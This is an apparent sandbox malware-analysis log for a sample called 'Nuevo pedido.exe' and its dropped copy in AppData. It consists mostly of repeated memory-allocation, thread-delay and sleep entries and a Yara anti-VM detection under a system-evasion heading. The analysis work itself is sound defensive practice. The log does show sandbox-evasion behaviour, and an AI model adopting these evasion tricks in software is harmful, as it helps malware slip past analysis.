Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match	File source: Process Memory Space: Nuevo pedido.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: QGVhHsAOjb.exe PID: 7900, type: MEMORYSTR

Source: C:\Users\user\Desktop\Nuevo pedido.exe	Memory allocated: E50000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Memory allocated: 28B0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Memory allocated: 2660000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Memory allocated: 8880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Memory allocated: 9880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Memory allocated: 9A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Memory allocated: AA80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Memory allocated: B030000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Memory allocated: 8880000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Memory allocated: 2F20000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Memory allocated: 3100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Memory allocated: 5100000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Memory allocated: 2EC0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Memory allocated: 30D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Memory allocated: 50D0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Memory allocated: 8BF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Memory allocated: 9BF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Memory allocated: 9DE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Memory allocated: ADE0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Memory allocated: B490000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Memory allocated: 8BF0000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Memory allocated: 3050000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Memory allocated: 3240000 memory reserve \| memory write watch
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Memory allocated: 5240000 memory reserve \| memory write watch

Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 600000	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 599875	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 599766	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 599657	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 599532	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 599407	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 599282	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 599157	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 599032	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 598922	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 598813	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 598688	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 598563	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 598438	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 598313	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 598203	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 598094	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 597969	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 597860	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 597735	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 597610	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 597485	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 597360	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 597219	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 597109	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 597000	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 596891	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 596766	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 596641	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 596532	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 596407	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 596282	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 596172	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 596063	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 595938	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 595813	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 595688	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 595563	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 595453	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 595344	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 595219	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 595110	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 594985	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 594860	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 594735	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 594610	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 594485	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 594360	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 594235	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 594110	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Thread delayed: delay time: 593985	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 922337203685477
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 600000
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 599891
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 599782
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 599657
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 599532
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 599407
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 599282
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 599157
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 599047
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 598938
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 598813
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 598688
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 598563
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 598438
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 598328
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 598219
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 598094
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 597985
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 597860
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 597735
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 597610
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 597485
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 597360
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 597235
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 597110
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 596985
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 596860
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 596735
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 596610
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 596485
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 596360
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 595732
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 595625
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 595516
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 595406
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 595297
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 595188
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 595063
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 594953
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 594842
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 594734
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 594625
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 594516
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 594391
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 594282
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 594157
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 594028
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 593922
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 593801
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Thread delayed: delay time: 593667

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7181	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 456	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7026	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 739	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Window / User API: threadDelayed 2694	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Window / User API: threadDelayed 7124	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe	Window / User API: foregroundWindowGot 1769	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Window / User API: threadDelayed 1785
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe	Window / User API: threadDelayed 8049

Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 7308	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7640	Thread sleep count: 7181 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7620	Thread sleep count: 456 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7848	Thread sleep time: -3689348814741908s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7756	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7828	Thread sleep time: -8301034833169293s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 7740	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -29514790517935264s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -600000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -599875s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -599766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -599657s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -599532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -599407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -599282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -599157s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -599032s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -598922s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -598813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -598688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -598563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -598438s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -598313s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -598203s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -598094s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -597969s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -597860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -597735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -597610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -597485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -597360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -597219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -597109s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -597000s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -596891s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -596766s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -596641s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -596532s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -596407s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -596282s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -596172s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -596063s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -595938s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -595813s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -595688s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -595563s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -595453s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -595344s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -595219s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -595110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -594985s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -594860s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -594735s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -594610s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -594485s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -594360s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -594235s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -594110s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\Nuevo pedido.exe TID: 8020	Thread sleep time: -593985s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 7952	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -600000s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -599891s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -599782s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -599657s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -599532s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -599407s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -599282s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -599157s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -599047s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -598938s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -598813s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -598688s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -598563s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -598438s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -598328s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -598219s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -598094s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -597985s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -597860s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -597735s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -597610s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -597485s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -597360s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -597235s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -597110s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -596985s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -596860s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -596735s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -596610s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -596485s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -596360s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -595732s >= -30000s
Source: C:\Users\user\AppData\Roaming\QGVhHsAOjb.exe TID: 5228	Thread sleep time: -595625s >= -30000s
